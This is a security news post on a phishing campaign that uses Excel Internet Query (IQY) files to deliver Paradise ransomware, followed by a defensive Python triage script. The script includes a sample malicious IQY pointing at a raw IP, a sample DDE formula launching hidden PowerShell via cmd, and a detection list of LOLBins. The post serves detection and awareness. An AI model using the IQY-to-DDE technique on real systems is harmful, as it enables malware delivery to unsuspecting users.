Researchers at Lastline have identified a phishing campaign that uses Internet Query (IQY) files to slip past security filters and deliver a new version of the Paradise ransomware. The researchers explain that IQY is an obscure but legitimate Microsoft Office file format; because the file itself carries no payload, only a URL for Excel to fetch, many security solutions do not flag it.
“IQY, or Internet Query files, are simple text files read by Excel that download data from the Internet,” they write. “This file type can be leveraged to download an Excel formula (command) that could abuse a system process, such as PowerShell, cmd, mshta, or any other LoLBins (Living-off-the-Land Binaries). As this is a legitimate Excel file type, many organizations will not block or filter it. For organizations that do have security appliances that analyze attachments, these files may not flag as malware, as there is no payload.”
Paradise ransomware has been in circulation since 2017, and it’s still receiving updates from its developers. In this case, the ransom note contains a link to a chat room where the victim can communicate with the attacker, although the researchers didn’t get a response to their messages.
The researchers conclude that these files are difficult to flag since there is nothing inherently malicious in them, so detection has to focus on the URL the file points to and on what that URL returns.
“In summary, this campaign exhibited how weaponized IQYs can be an effective technique for an attacker to infiltrate a network,” they write. “Since these IQYs contain no payload (just a URL), they can be challenging for organizations to detect. Organizations may have to rely on a 3rd party URL reputation service if they do not have appliances in place to analyze and interrogate these URLs.”
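The two points above (the IQY format is a plain text file whose only indicator is a URL, and detection therefore has to concentrate on that URL and on what it fetches) can be turned into a small triage tool. The following Python script is an added example and is not code from Lastline or from the campaign it describes. It parses the standard Excel web-query layout (a `WEB` header line, a version line, the URL, then optional `key=value` options), checks the URL against an assumed allowlist of internal web-query hosts, and scans an already-fetched response body for DDE-style formulas that launch a living-off-the-land binary. The allowlist entries, the sample attachment and the sample response body are all constructed for illustration.

```python
"""Offline triage for Internet Query (.iqy) attachments (added example).

An IQY file is a short text file: a "WEB" header line, a version line
("1"), a URL line, then optional key=value options. Excel fetches the
URL and writes the response into the worksheet, so the only indicator
inside the file is that URL. This script extracts it, applies a few
cheap checks, and scans an already-fetched response body for DDE-style
formulas that would launch a LOLBin such as cmd, powershell or mshta.
"""
import ipaddress
import re
from urllib.parse import urlparse

# Hosts the organisation legitimately pulls web queries from (assumed values).
ALLOWED_HOSTS = {"intranet.example.com", "reports.example.com"}

# Binaries commonly launched from Excel DDE formulas.
LOLBINS = ("cmd", "powershell", "mshta", "rundll32", "regsvr32",
           "certutil", "wscript", "cscript")

# Matches a whole line of the form "=cmd|'/c ...'!A0" or "=mshta|...!A1".
DDE_FORMULA = re.compile(r"^\s*=\s*(?:%s)\b.*\|.*$" % "|".join(LOLBINS),
                         re.IGNORECASE | re.MULTILINE)


def parse_iqy(text):
    """Split an IQY file into its header, version, URL and option lines."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not a WEB query file")
    options = {}
    for ln in lines[3:]:
        key, _, value = ln.partition("=")
        options[key.strip()] = value.strip()
    return {"type": lines[0], "version": lines[1], "url": lines[2],
            "options": options}


def assess_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Return (verdict, reasons); verdict is 'allow', 'review' or 'block'."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if host in allowed_hosts and parsed.scheme in ("http", "https"):
        return "allow", ["host is on the web-query allowlist"]
    reasons = ["host %r is not on the allowlist" % host]
    severe = False
    if parsed.scheme not in ("http", "https"):
        reasons.append("unexpected scheme %r" % parsed.scheme)
        severe = True
    if not host:
        reasons.append("no host in URL")
        severe = True
    else:
        try:
            ipaddress.ip_address(host)   # raw IP literals are a common tell
            reasons.append("raw IP literal instead of a hostname")
            severe = True
        except ValueError:
            pass
    return ("block" if severe else "review"), reasons


def find_dde_formulas(body):
    """Return fetched-content lines that are DDE-style LOLBin launches."""
    return [m.group(0).strip() for m in DDE_FORMULA.finditer(body)]


def triage(iqy_text, fetched_body=""):
    """Combine the file parse, URL checks and body scan into one verdict."""
    info = parse_iqy(iqy_text)
    verdict, reasons = assess_url(info["url"])
    hits = find_dde_formulas(fetched_body) if fetched_body else []
    if hits:
        verdict = "block"
        reasons.append("fetched content contains %d DDE/LOLBin formula(s)" % len(hits))
    return {"url": info["url"], "verdict": verdict, "reasons": reasons,
            "formulas": hits}


# Constructed samples (not taken from the campaign): a suspicious attachment
# pointing at a raw IP whose response is a DDE formula, and a benign query.
SAMPLE_IQY = "WEB\n1\nhttp://203.0.113.10/update.txt\n\nSelection=EntirePage\nFormatting=None\n"
SAMPLE_BODY = "=cmd|' /c powershell -nop -w hidden -c \"Write-Host test\"'!A0\n"
BENIGN_IQY = "WEB\n1\nhttps://reports.example.com/sales?range=week\nSelection=1\n"

if __name__ == "__main__":
    for name, iqy, body in (("suspicious", SAMPLE_IQY, SAMPLE_BODY),
                            ("benign", BENIGN_IQY, "")):
        result = triage(iqy, body)
        print(name, result["verdict"], result["url"])
        for reason in result["reasons"]:
            print("  -", reason)
        for formula in result["formulas"]:
            print("  formula:", formula)
```

In practice the body scan would run on the response a sandbox or URL-interrogation appliance fetched; the script deliberately makes no network calls so the checks can run on a mail gateway before anything is downloaded. A URL that is merely off the allowlist lands in `review`, which is where a reputation lookup would be consulted, while a raw IP literal or an odd scheme is blocked outright.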
Even URL reputation services aren’t foolproof, since attackers are constantly shifting to new domains. Technical defenses can’t stop every malicious email from entering your network, and it only takes one employee opening an attachment or clicking on a link for your organization to be compromised. Your employees are an essential line of defense, and new-school security awareness training can help them thwart these attacks.
Lastline has the story: https://www.lastline.com/labsblog/iqy-files-and-paradise-ransomware/